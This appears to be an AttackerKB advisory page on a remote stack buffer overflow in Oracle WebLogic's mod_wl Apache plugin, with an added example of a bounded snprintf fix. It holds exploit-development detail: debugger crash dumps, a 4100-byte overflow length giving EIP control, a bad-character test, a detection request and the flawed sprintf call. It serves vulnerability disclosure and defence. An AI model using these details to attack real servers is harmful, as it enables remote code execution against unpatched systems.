Oracle mod_wl HTTP POST Request Remote Buffer Overflow Vulnerability

2019-05-09T17:57:49
ID AKB:957310CF-4BD0-42F5-9281-6952E61636A6
Type attackerkb
Reporter AttackerKB
Modified 2020-02-13T17:12:21

Description

Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.

Recent assessments:

wchen-r7 at 2019-09-12T18:07:05.928637Z reported:

Details

BEA WebLogic 8.1 + Apache: http://docs.oracle.com/cd/E13222_01/wls/docs81/plugins/apache.html

First crash

```
(328.c38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\RPCRT4.dll -
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
eax=00000045 ebx=006a5d58 ecx=43434343 edx=7c90e4f4 esi=10013932 edi=000000a8
eip=77ea4126 esp=0280d7ec ebp=0280e818 iopl=0         ov up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010a03
RPCRT4!NdrVaryingArrayUnmarshall+0x81:
77ea4126 008945107416    add     byte ptr [ecx+16741045h],cl ds:0023:59b75388=??
0:132> .symfix
0:132> .reload
Reloading current modules
.............................................
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0:132> kb
ChildEBP RetAddr  Args to Child
0280e818 10001a8a 006a5d58 006b8ce0 0280fa38 RPCRT4!NdrVaryingArrayUnmarshall+0x82
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
0280fef4 6ff0155f 006a5d58 006a1e28 006a5d58 mod_wl_20+0x1a8a
0280ff08 6ff018a9 006a5d58 006a5d58 00000000 libhttpd!ap_run_handler+0x1f
0280ff18 6ff0d97c 006a5d58 006a5d58 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c
```

More controlled crash: length 4100

```
ChildEBP RetAddr  Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0440d7d4 41414141 54544820 2e312f50 000a0d31 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0440e818 10001a8a 006a9388 0069cb20 0440fa38 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
0440fef4 6ff0155f 006a9388 0068dcf8 006a9388 mod_wl_20+0x1a8a
0440ff08 6ff018a9 006a9388 006a9388 00000000 libhttpd!ap_run_handler+0x1f
0440ff18 6ff0d97c 006a9388 006a9388 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c
```

mod_wl detection via Nessus

weblogic_mod_wl_overflow.nasl: "TITLE>Weblogic Bridge Message" >< res[2] ||

```
POST /index.jsp HTTP/1.1
Host: 192.168.1.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: -1

TML>
<HEAD>
<TITLE>Weblogic Bridge Message </TITLE>
</HEAD>
<BODY>
<H2>Failure of server APACHE bridge:</H2><P>
<hr><PRE>Internal Server failure, APACHE plugin. Cannot continue.</PRE>
<hr><BR><B>Build date/time:</B> <I>Jun 16 2006 15:14:11</I>
<P><HR><B>Change Number:</B> <I>779586</I>
</BODY>
</HTML>
<HTML>
<HEAD>
<TITLE>Weblogic Bridge Message
```

mod_wl overflow

```
.text:1000E751 push    ecx             ; it should be HTTP/1.1 but.... failed :)
.text:1000E752 push    edx
.text:1000E753 mov     edx, [ebp+214h]
.text:1000E759 push    edx
.text:1000E75A push    offset aSSS     ; "%s %s %s\r\n"
.text:1000E75F push    eax             ; Dest
.text:1000E760 call    ds:sprintf      ; here is where the overflow happens!
```

GET EIP on RET

```
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edeb esp=0440c7b8 ebp=0440e818 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mod_wl_20+0xedeb:
1000edeb 81c41c100000    add     esp,101Ch
0:244> db esp
0440c7b8  1f 00 00 00 16 00 00 00-00 00 00 00 4a 01 00 00  ............J...
0440c7c8  48 6f 73 74 3a 20 31 39-32 2e 31 36 38 2e 31 2e  Host: 192.168.1.
0440c7d8  31 33 30 0d 0a 55 73 65-72 2d 41 67 65 6e 74 3a  130..User-Agent:
0440c7e8  20 4d 6f 7a 69 6c 6c 61-2f 34 2e 30 20 28 63 6f   Mozilla/4.0 (co
0440c7f8  6d 70 61 74 69 62 6c 65-3b 20 4d 53 49 45 20 36  mpatible; MSIE 6
0440c808  2e 30 3b 20 57 69 6e 64-6f 77 73 20 4e 54 20 35  .0; Windows NT 5
0440c818  2e 31 29 0d 0a 43 6f 6e-74 65 6e 74 2d 54 79 70  .1)..Content-Typ
0440c828  65 3a 20 61 70 70 6c 69-63 61 74 69 6f 6e 2f 78  e: application/x
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edf1 esp=0440d7d4 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
mod_wl_20+0xedf1:
1000edf1 c3              ret
0:244> db esp
0440d7d4  41 41 41 41 41 41 41 41-01 02 03 04 05 06 07 08  AAAAAAAA........
0440d7e4  09 0b 0c 0e 0f 10 11 12-13 14 15 16 17 18 19 1a  ................
0440d7f4  1b 1c 1d 1e 1f 20 21 22-23 24 25 26 27 28 29 2a  ..... !"#$%&'()*
0440d804  2b 2c 2d 2e 2f 30 31 32-33 34 35 36 37 38 39 3a  +,-./0123456789:
0440d814  3b 3c 3d 3e 40 41 42 43-44 45 46 47 48 49 4a 4b  ;<=>@ABCDEFGHIJK
0440d824  4c 4d 4e 4f 50 51 52 53-54 55 56 57 58 59 5a 5b  LMNOPQRSTUVWXYZ[
0440d834  5c 5d 5e 5f 60 61 62 63-64 65 66 67 68 69 6a 6b  \]^_`abcdefghijk
0440d844  6c 6d 6e 6f 70 71 72 73-74 75 76 77 78 79 7a 7b  lmnopqrstuvwxyz{
0:244> t
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=41414141 esp=0440d7d8 ebp=0440e818 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
41414141 ??              ???
```
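The disassembly above shows the root cause: the three request-line tokens are written into a fixed stack buffer with an unbounded `sprintf("%s %s %s\r\n", ...)`, so an oversized HTTP version token runs past the buffer and onto the saved return address. As an added example, not the plugin's code and not part of the assessment, this is the defensive shape of the same operation: the version token is validated against the HTTP grammar before use, and the line is built with `snprintf` whose return value is checked for truncation. The buffer size `LINE_BUF` and the function names are assumptions for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Fixed-size line buffer; the size is an assumption for this example,
 * the real plugin's buffer size is not stated in the assessment. */
#define LINE_BUF 512

/* Accept only "HTTP/<1-3 digits>.<1-3 digits>". A 4100-byte version
 * token, or any other junk, is rejected before it is ever formatted. */
static int valid_http_version(const char *v)
{
    size_t i;
    if (strncmp(v, "HTTP/", 5) != 0) return 0;
    v += 5;
    for (i = 0; isdigit((unsigned char)v[i]); i++) ;
    if (i == 0 || i > 3 || v[i] != '.') return 0;
    v += i + 1;
    for (i = 0; isdigit((unsigned char)v[i]); i++) ;
    return i >= 1 && i <= 3 && v[i] == '\0';
}

/* Bounded replacement for sprintf(dst, "%s %s %s\r\n", ...). Returns the
 * line length, or -1 if the version is malformed or the line would not
 * fit. snprintf returns the length the full string would have had, so
 * comparing it against dstlen detects truncation instead of overflowing. */
int build_request_line(char *dst, size_t dstlen, const char *method,
                       const char *uri, const char *version)
{
    int n;
    if (!valid_http_version(version)) return -1;
    n = snprintf(dst, dstlen, "%s %s %s\r\n", method, uri, version);
    if (n < 0 || (size_t)n >= dstlen) {
        if (dstlen) dst[0] = '\0';  /* never pass a partial line downstream */
        return -1;
    }
    return n;
}

int main(void)
{
    char line[LINE_BUF], longver[4101];  /* constructed: the 4100-byte case */
    memset(longver, 'A', 4100);
    longver[4100] = '\0';
    printf("normal:    %d\n", build_request_line(line, sizeof line, "POST", "/index.jsp", "HTTP/1.1"));
    printf("oversized: %d\n", build_request_line(line, sizeof line, "POST", "/index.jsp", longver));
    return 0;
}
```

Both rejection paths are distinct on purpose: the grammar check catches the case on this page, while the `snprintf` length check still protects the buffer when the oversized token is the method or URI instead.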

References

http://www.securityfocus.com/bid/30273/info